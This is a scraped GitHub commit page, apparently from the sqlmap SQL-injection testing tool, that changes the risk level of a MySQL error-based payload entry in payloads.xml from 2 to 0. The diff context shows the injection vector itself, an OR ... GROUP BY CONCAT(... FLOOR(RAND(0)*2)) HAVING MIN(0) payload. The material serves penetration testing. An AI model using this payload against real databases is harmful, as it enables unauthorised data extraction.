Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 96c3ffd

Browse files
committed
changing risk level to 0 - lots of MySQL databases around have information_schema unreadable, thus disabling first AND based error payload
1 parent c042376 commit 96c3ffd

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

xml/payloads.xml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -912,7 +912,7 @@ Formats:
912912
<title>MySQL OR error-based - WHERE clause</title>
913913
<stype>2</stype>
914914
<level>2</level>
915-
<risk>2</risk>
915+
<risk>0</risk>
916916
<clause>1</clause>
917917
<where>2</where>
918918
<vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>

0 commit comments

Comments
 (0)